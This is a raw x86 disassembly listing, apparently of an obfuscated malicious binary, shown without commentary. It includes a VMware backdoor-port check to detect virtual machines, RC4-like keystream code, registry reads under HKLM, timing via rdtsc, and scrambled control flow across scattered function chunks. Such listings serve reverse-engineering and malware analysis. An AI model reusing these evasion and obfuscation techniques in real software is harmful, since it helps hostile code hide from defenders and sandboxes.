mov [ebp+var_4050], eax
sub ebx, ebx
mov bx, [esi+10h]
mov [ebp+var_4058], ebx
mov [ebp+var_4], 0
or edi, 0FFFFFFFFh
mov [ebp+var_4040], edi
push 11h
movzx ecx, bx
push ecx
call sub_9AE400
test eax, eax
jz loc_9B504C
jmp off_9BA39C
sub_9B2E04 endp
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AD7A4
loc_9B2E90: ; CODE XREF: sub_9AD7A4+EC�j
; DATA XREF: .text:off_9BAC17�o
mov [eax], cl
movzx ecx, cl
lea ecx, [eax+ecx+2]
mov [esp+10h+var_1], bl
mov bl, [ecx]
add [eax+1], bl
mov bl, [eax+1]
mov [esp+10h+var_3], bl
mov bl, [ecx]
movzx esi, [esp+10h+var_3]
mov [esp+10h+var_4], bl
mov bl, [eax+esi+2]
mov [ecx], bl
movzx ecx, byte ptr [eax+1]
mov bl, [esp+10h+var_4]
mov [eax+ecx+2], bl
movzx ecx, byte ptr [eax+1]
mov cl, [eax+ecx+2]
movzx esi, byte ptr [eax]
add cl, [eax+esi+2]
movzx ecx, cl
movzx eax, byte ptr [eax+ecx+2]
xor ecx, ecx
mov ch, dl
movzx edx, [esp+10h+var_1]
pop edi
pop esi
pop ebx
mov cl, [esp+4+var_2]
shl ecx, 8
or ecx, edx
shl ecx, 8
or eax, ecx
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_9AD7A4
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-1Ch]
pop eax
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B2F1C proc near ; CODE XREF: sub_9ACA48+92�p
; sub_9B1D80-2059�p ...
; FUNCTION CHUNK AT 009AB548 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009ABB74 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AD444 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009ADA40 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009AE688 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 009AF3D0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AF570 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009B21B0 SIZE 0000003B BYTES
; FUNCTION CHUNK AT 009B22F0 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009B528F SIZE 00000019 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA3F0
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
push dword ptr [ebp+0Ch]
pop eax
mov dword ptr [eax], 0
mov esi, [ebp+8]
mov ecx, 800h
sub eax, eax
mov edi, esi
rep stosd
push 0Ah
pop eax
mov [ebp-1Ch], eax
mov edi, [ebp+10h]
sub ebx, ebx
test edi, edi
setnz bl
push dword ptr [ebp+14h]
pop ecx
neg ecx
sbb ecx, ecx
and ecx, 2
mov edx, [ebp+34h]
or ebx, ecx
neg edx
sbb edx, edx
and edx, 80h
or ebx, edx
sub ecx, ecx
cmp dword ptr [ebp+18h], 6
setnz cl
dec ecx
and ecx, 4
or ebx, ecx
mov ecx, [ebp+1Ch]
push ecx
pop edx
neg edx
sbb edx, edx
and edx, 8
or ebx, edx
push dword ptr [ebp+20h]
pop edi
push edi
pop edx
neg edx
sbb edx, edx
and edx, 10h
or ebx, edx
push dword ptr [ebp+24h]
pop edx
neg edx
sbb edx, edx
and edx, 20h
or ebx, edx
push dword ptr [ebp+30h]
pop edx
neg edx
sbb edx, edx
and edx, 40h
or ebx, edx
mov [ebp-20h], ebx
mov [esi+8], bx
test bl, 8
jz loc_9B21DC
jmp off_9B9F7E
sub_9B2F1C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEC20
loc_9B2FEC: ; CODE XREF: sub_9AEC20+8F7�j
mov ecx, off_9B9844
call sub_9B5480
mov dword_9BBE3C, esi
mov [ebp-228h], edi
loc_9B3003: ; CODE XREF: sub_9AEC20+8F1�j
lea ecx, [ebp-228h]
call sub_9B5480
lea edx, [ebp-224h]
push edx
push 7
mov eax, dword_9BBD28
push eax
call sub_9AE860
add esp, 0Ch
push eax
lea edx, [ebp-120h]
push 80000002h
pop ecx
call sub_9B3408
mov esi, eax
sub edx, edx
mov [ebp-228h], esi
push dword_9BBE3C
pop ecx
call sub_9AEE5C
mov ebx, eax
mov ecx, esi
and ebx, 7FFFFFFFh
call sub_9AEE5C
and eax, 7FFFFFFFh
cmp eax, ebx
jbe loc_9AC8C0
jmp off_9BAF9F
; END OF FUNCTION CHUNK FOR sub_9AEC20
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B3070: ; CODE XREF: sub_9B1D80+47EB�j
jmp loc_9B3ECB
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B3078: ; CODE XREF: sub_9B0930+260�j
; DATA XREF: .text:off_9B927C�o
push off_9B884C
mov eax, [eax+18h]
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx+18h]
pop ecx
mov [ecx+4], eax
push dword_9BCB74
pop edx
mov eax, [edx+18h]
push dword ptr [eax+4]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9B08FC
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B30B0: ; CODE XREF: sub_9AC6DC+6F1B�j
; sub_9AC6DC:loc_9B4D80�j
; DATA XREF: ...
mov esi, eax
mov edi, ebx
mov dword_9BBD18, esi
mov dword_9BBD1C, edi
jmp loc_9ABAAA
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B30C8: ; CODE XREF: sub_9ADDA4+3D�j
cmp edi, 9
ja loc_9AED3C
jmp loc_9B1C08
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B30E0: ; CODE XREF: sub_9B4FD0-A05C�j
; DATA XREF: .text:off_9BA031�o
lea esi, [ebp-224h]
mov [ebp-230h], eax
call sub_9B3BE8
push eax
mov eax, [ebp-230h]
call dword ptr [eax+6Ch]
mov dword_9BBF9C[edi], eax
test eax, eax
jz sub_9ABB50
jmp loc_9B0D54
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B3110: ; CODE XREF: sub_9ADAC4-464�j
; DATA XREF: .text:off_9B9559�o
push dword ptr [ebp+eax*4-84h]
pop ecx
or ecx, ecx
jnz loc_9AF9F4
jmp off_9B8DEF
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B3128: ; CODE XREF: sub_9B4950-757B�j
; DATA XREF: .text:off_9B8EDE�o
mov [ebp-20h], eax
sub eax, eax
loc_9B312D: ; CODE XREF: sub_9B4950-1621�j
mov [ebp-1Ch], eax
cmp eax, 20h
jge loc_9B2944
jmp loc_9AFF4C
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B3140: ; CODE XREF: sub_9B649C-7A8D�j
lea ecx, [eax+3]
cmp ecx, edi
ja loc_9ACCD8
jmp loc_9AC234
; END OF FUNCTION CHUNK FOR sub_9B649C
; =============== S U B R O U T I N E =======================================
sub_9B3150 proc near ; CODE XREF: sub_9B3408-628B�p
; sub_9AF25C+46�p ...
; FUNCTION CHUNK AT 009AADE4 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009AB848 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009AC39C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AEB78 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AEFA3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B0094 SIZE 00000047 BYTES
; FUNCTION CHUNK AT 009B0C88 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 009B5F24 SIZE 00000019 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA10B
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
push ecx
pop ebx
xor eax, eax
mov [ebp-1Ch], eax
mov [ebp-4], eax
cmp ebx, eax
jz loc_9AEFA3
jmp loc_9AB848
sub_9B3150 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B3194: ; CODE XREF: sub_9B649C-7EA4�j
add eax, 4
mov [ebp+var_1C], eax
loc_9B319A: ; CODE XREF: sub_9B649C-7EAA�j
cmp eax, edi
jbe loc_9ACCDD
jmp loc_9ACCD8
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B31A8 proc near ; CODE XREF: sub_9ADAC4-2B26�p
; sub_9B4950-8E39�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AE0B8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B084C SIZE 0000003B BYTES
; FUNCTION CHUNK AT 009B12E0 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009B1CBF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009B4308 SIZE 00000010 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B8DD8
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
xor edi, edi
mov [ebp+var_18], esp
mov [ebp+var_1C], edi
mov [ebp+var_4], edi
push ecx
pop esi
cmp esi, edi
jz loc_9B1CBF
jmp loc_9B4308
sub_9B31A8 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB11C
loc_9B31EC: ; CODE XREF: sub_9AB11C+37�j
call dword ptr [eax+1Ch]
retn 8
; END OF FUNCTION CHUNK FOR sub_9AB11C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B31F4: ; CODE XREF: sub_9B0930-1234�j
; DATA XREF: .text:off_9B8824�o
push off_9BAB68
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx]
mov [edx+44h], eax
push dword_9BCB74
pop eax
push dword ptr [eax]
pop eax
mov ecx, [eax+44h]
or ecx, ecx
jz loc_9B23EF
jmp off_9BADF8
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEDD0
loc_9B3228: ; CODE XREF: sub_9AEDD0-33DF�j
; sub_9AEDD0+20�j ...
add eax, 28h
cmp eax, 500h
jb loc_9AEDE8
jmp loc_9B2998
; END OF FUNCTION CHUNK FOR sub_9AEDD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1B20
loc_9B323C: ; CODE XREF: sub_9B1B20-D5F�j
; DATA XREF: .text:off_9B96D4�o
push dword_9BCB74
pop eax
push dword ptr [eax+0Ch]
pop ecx
push edi
push esi
push 3
push 0
lea edx, [ebp+var_120]
push edx
mov eax, [ebp+var_32C]
push eax
call dword ptr [ecx+18h]
test eax, eax
jnz loc_9AC1AA
jmp loc_9AC1A0
; END OF FUNCTION CHUNK FOR sub_9B1B20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B326C: ; CODE XREF: sub_9ADAC4-2BDB�j
cmp ebx, 0FFFFFFFFh
jz loc_9ADCDF
jmp off_9B8CB5
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B327C proc near ; CODE XREF: sub_9B5904-93C2�p
; sub_9B1D80-4B6F�p ...
; FUNCTION CHUNK AT 009AB10C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009ABA24 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 009B2CE4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B4264 SIZE 00000006 BYTES
mov ecx, eax
and ecx, 0FFFFh
cmp ecx, 0A8C0h
jz loc_9B4264
jmp off_9BAAA5
sub_9B327C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B3298: ; CODE XREF: sub_9B649C-A0D2�j
push 10h
pop eax
mov [ebp+var_1C], eax
loc_9B329E: ; CODE XREF: sub_9B649C-A0D8�j
test bl, 10h
jz loc_9B1842
jmp off_9BAA09
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B4480
loc_9B32B0: ; CODE XREF: sub_9B4480-1BBD�j
; DATA XREF: .text:off_9BAAC8�o
cmp [ebp+var_32C], ebx
jnz loc_9B46EF
jmp loc_9B46E4
; END OF FUNCTION CHUNK FOR sub_9B4480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B32C4: ; CODE XREF: sub_9B4950-12D8�j
; DATA XREF: .text:off_9B9485�o
lea ebx, dword_9BEC3C[edi]
push ebx
pop ecx
call sub_9B31A8
lea ecx, dword_9BEC40[edi]
mov [ebp-24h], ecx
call sub_9B31A8
mov eax, dword_9BEC2C[edi]
push dword ptr [ebp-20h]
pop ecx
push ecx
lea esi, [ebp-4Ch]
call sub_9AC250
push dword ptr [ebp-44h]
pop edx
push edx
push dword_9BEC2C[edi]
pop eax
push eax
push off_9B9F6A
call sub_9ABF08
mov [ebx], eax
mov eax, [ebp-40h]
push eax
push dword_9BEC2C[edi]
pop ecx
push ecx
push off_9BB054
call sub_9ABF08
push dword ptr [ebp-24h]
pop edx
xor ebx, ebx
mov [edx], eax
mov eax, [ebp-1Ch]
loc_9B332E: ; CODE XREF: sub_9B4950-49F8�j
; sub_9B4950-12DE�j ...
inc eax
jmp loc_9B312D
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B3334: ; CODE XREF: sub_9ADAC4-1C8C�j
push 0
push edi
push off_9B9099
call sub_9ABF08
mov [ebp+esi*4-84h], eax
test eax, eax
jnz loc_9AE6B5
jmp loc_9AE6A8
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B5480
loc_9B335B: ; CODE XREF: sub_9B5480-9C16�j
; sub_9B5480-49CB�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B5480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B3374: ; CODE XREF: sub_9B3864-37D8�j
movzx ebx, [ebp+var_2022]
sub ecx, ecx
mov cl, [ebp+var_2024]
and ecx, 1
push ecx
push [ebp+var_2020]
pop ecx
push ecx
mov edx, [ebp+var_2028]
push edx
push eax
mov ecx, ebx
call sub_9AF030
or eax, eax
jz loc_9AF480
jmp loc_9B6488
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B33AC: ; CODE XREF: sub_9ACEE8+8AB1�j
call sub_9B227C
mov [ebp-0BCh], eax
call sub_9B227C
sub edi, eax
mov [ebp-0C4h], edi
jnz loc_9B0F7F
jmp loc_9B0F74
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9B33D0: ; CODE XREF: sub_9AD11C+3A31�j
push 1
pop edi
jmp loc_9AFA58
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B33DB: ; CODE XREF: sub_9AF25C-3983�j
; sub_9AF25C-2D3D�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BADC8
call dword ptr [ecx+1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B3408 proc near ; CODE XREF: sub_9AEC20+81�p
; sub_9AEC20+4412�p
; FUNCTION CHUNK AT 009AB1EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AB734 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009ABD60 SIZE 0000003E BYTES
; FUNCTION CHUNK AT 009ACE18 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AD158 SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009ADFBC SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AE614 SIZE 0000003D BYTES
; FUNCTION CHUNK AT 009AF0B8 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B07FC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B292C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B3754 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B62E4 SIZE 00000033 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B992A
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 128h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov edi, ecx
push edx
pop ebx
sub esi, esi
mov [ebp-18h], esp
mov eax, [ebp+8]
mov [ebp-138h], eax
mov [ebp-124h], esi
mov [ebp-12Ch], esi
mov [ebp-134h], esi
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push off_9BADC8
call dword ptr [edx+18h]
mov [ebp-4], esi
mov eax, dword_9BCB74
mov ecx, [eax+0Ch]
lea edx, [ebp-124h]
push edx
push 20019h
push esi
push ebx
push edi
call dword ptr [ecx+20h]
and eax, eax
jz loc_9AE614
jmp loc_9AB1EC
sub_9B3408 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B19D8
loc_9B349C: ; CODE XREF: sub_9B19D8+31CA�j
inc dword ptr [ebp-404Ch]
mov ebx, [ebp-4050h]
jmp loc_9ADC2E
; END OF FUNCTION CHUNK FOR sub_9B19D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B34B0: ; CODE XREF: sub_9ACEE8+5DBC�j
; DATA XREF: .text:off_9B9F82�o
push 1
pop ebx
mov [ebp-0B4h], ebx
loc_9B34B9: ; CODE XREF: sub_9ACEE8+544C�j
; sub_9ACEE8+78EA�j
test ebx, ebx
jz loc_9ACF55
jmp loc_9AC65C
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B57B4
loc_9B34C8: ; CODE XREF: sub_9B57B4+48�j
; DATA XREF: .text:off_9BAEFD�o
push off_9B8ED2
call dword ptr [ecx+68h]
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
lea ecx, [ebp+var_44]
push ecx
call dword ptr [eax+64h]
push dword_9BCB74
pop edx
mov eax, [edx]
call dword ptr [eax+30h]
mov [ebp+var_34], eax
rdtsc
mov [ebp+var_148], edx
mov [ebp+var_14C], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], edx
mov ecx, dword_9BCB74
mov edx, [ecx+0Ch]
push 0F0000000h
push 1
jmp off_9BA707
; END OF FUNCTION CHUNK FOR sub_9B57B4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B351C: ; CODE XREF: sub_9B1A08-567A�j
; sub_9B1A08-43E1�j
xor eax, eax
loc_9B351E: ; CODE XREF: sub_9B1A08-3E75�j
push eax
push 0
push 0
push 0
push 0
call sub_9B36E8
push eax
lea edx, [ebp+var_402C]
push edx
push 11h
push esi
push 1
lea eax, [ebp+var_41F8]
push eax
lea ecx, [ebp+var_201C]
push ecx
call sub_9B2F1C
add esp, 30h
push [ebp+var_41F8]
jmp loc_9B3778
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABF08
loc_9B355C: ; CODE XREF: sub_9ABF08+47�j
; DATA XREF: .text:off_9B926C�o
sub eax, eax
push esi
pop ecx
mov [ecx], eax
mov [ecx+4], eax
mov [ecx+8], eax
mov [ecx+0Ch], eax
mov [ecx+10h], eax
mov edx, [ebp+0Ch]
mov [esi+0Ch], edx
push dword ptr [ebp+10h]
pop eax
mov [esi+10h], eax
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push edi
push edi
push edi
push edi
call dword ptr [edx+20h]
mov [esi+8], eax
cmp eax, edi
jz loc_9AF20F
jmp off_9B8CD6
; END OF FUNCTION CHUNK FOR sub_9ABF08
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B35A0 proc near ; CODE XREF: sub_9ABB50+2�p
; sub_9AF030-2A01�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AC99B SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009B014C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B09E8 SIZE 0000003A BYTES
; FUNCTION CHUNK AT 009B10DC SIZE 00000028 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BA8AD
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
jmp loc_9B09E8
sub_9B35A0 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4610
loc_9B35CC: ; CODE XREF: sub_9B4610-610E�j
; DATA XREF: .text:off_9B911D�o
call sub_9B227C
sub eax, dword_9BBF98[esi]
cmp eax, 3Ch
jbe loc_9AF22F
jmp off_9B9864
; END OF FUNCTION CHUNK FOR sub_9B4610
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B35E8: ; CODE XREF: sub_9AC6DC+86AA�j
push dword_9BBD18
pop esi
cmp eax, esi
jbe loc_9ABAAA
jmp off_9BA1A9
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B3600: ; CODE XREF: sub_9AF030+60�j
; DATA XREF: .text:off_9B91B2�o
push [ebp+arg_4]
pop eax
cmp eax, dword_9BBFA0[esi]
jnz loc_9AC634
jmp loc_9B5738
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3618 proc near ; CODE XREF: sub_9B03E8+2790�p
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009ADF7B SIZE 0000001D BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BAB8C
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
sub eax, eax
mov [ebp+var_18], esp
mov [ebp+var_19], al
mov [ebp+var_4], eax
push 564D5868h
pop eax
mov ecx, 0Ah
mov dx, 5658h
in eax, dx
cmp ebx, 564D5868h
setz [ebp+var_19]
jmp loc_9ADF7B
sub_9B3618 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B366C: ; CODE XREF: sub_9B4950+78C�j
cmp dword_9BEC24[edi], ebx
jz loc_9B332E
jmp off_9B9485
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9B3680: ; CODE XREF: sub_9AC250+D4�j
push dword ptr [esi+4]
pop ebx
push ebx
pop edx
shr edx, 5
push edx
pop ecx
and ecx, 1Fh
push 1
pop ebp
shl ebp, cl
shr edx, 5
test dword_9BA4E8[edx*4], ebp
jnz loc_9AC264
jmp off_9BA7CD
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B36AC: ; CODE XREF: sub_9B4950-8893�j
; DATA XREF: .text:off_9B9E4D�o
xor esi, esi
loc_9B36AE: ; CODE XREF: sub_9B4950+12DF�j
mov [ebp-1Ch], esi
cmp esi, 20h
jge loc_9AD3C4
jmp loc_9B2778
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9B36C0: ; CODE XREF: sub_9AD11C+8472�j
push 4
pop edi
jmp loc_9AFA58
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B36C8: ; CODE XREF: sub_9B3864-5E69�j
sub edx, edx
loc_9B36CA: ; CODE XREF: sub_9B3864+251C�j
push eax
push ecx
push edi
push [ebp+var_2060]
pop eax
movzx ecx, word ptr [eax+2]
push ecx
mov eax, [eax+4]
push eax
push edx
push dword ptr [esi+4]
jmp loc_9B0068
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9B36E8 proc near ; CODE XREF: StartAddress+158�p
; sub_9AF25C:loc_9ABBC0�p ...
; FUNCTION CHUNK AT 009AC484 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AC73E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009ACC48 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009ACE64 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009ADF98 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009AE96C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009B532C SIZE 00000017 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BB021
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp-18h], esp
xor edi, edi
mov [ebp-1Ch], edi
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push off_9BADC8
call dword ptr [ecx+18h]
mov [ebp-4], edi
sub edx, edx
push dword_9BBE3C
pop ecx
call sub_9AEE5C
push eax
pop esi
mov [ebp-1Ch], esi
cmp esi, edi
jnz loc_9AC48D
jmp off_9B8CC1
sub_9B36E8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9B374C: ; CODE XREF: sub_9B3EFC-6825�j
; DATA XREF: .text:off_9B9449�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9B3754: ; CODE XREF: sub_9B3408-7CB0�j
; DATA XREF: .text:off_9B9713�o
mov ecx, dword_9BCB74
mov edx, [ecx+0Ch]
push eax
call dword ptr [edx+14h]
loc_9B3761: ; CODE XREF: sub_9B3408-7CB6�j
push dword ptr [ebp-134h]
pop eax
test eax, eax
jnz loc_9ADFCE
jmp off_9BA690
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B3778: ; CODE XREF: sub_9B1A08+1B4D�j
pop eax
test eax, eax
jz loc_9B16BE
jmp off_9B9280
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B3788: ; CODE XREF: sub_9B63D8-1421�j
sub eax, edx
mov [ebp-2150h], eax
push 0Ah
push 400h
mov edi, esi
lea ecx, [ebp-2120h]
call sub_9B5300
cmp eax, 4
jnz loc_9AF944
jmp loc_9AF368
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B37B4: ; CODE XREF: sub_9B0930-582C�j
push off_9B8E65
mov eax, [eax]
push eax
call esi
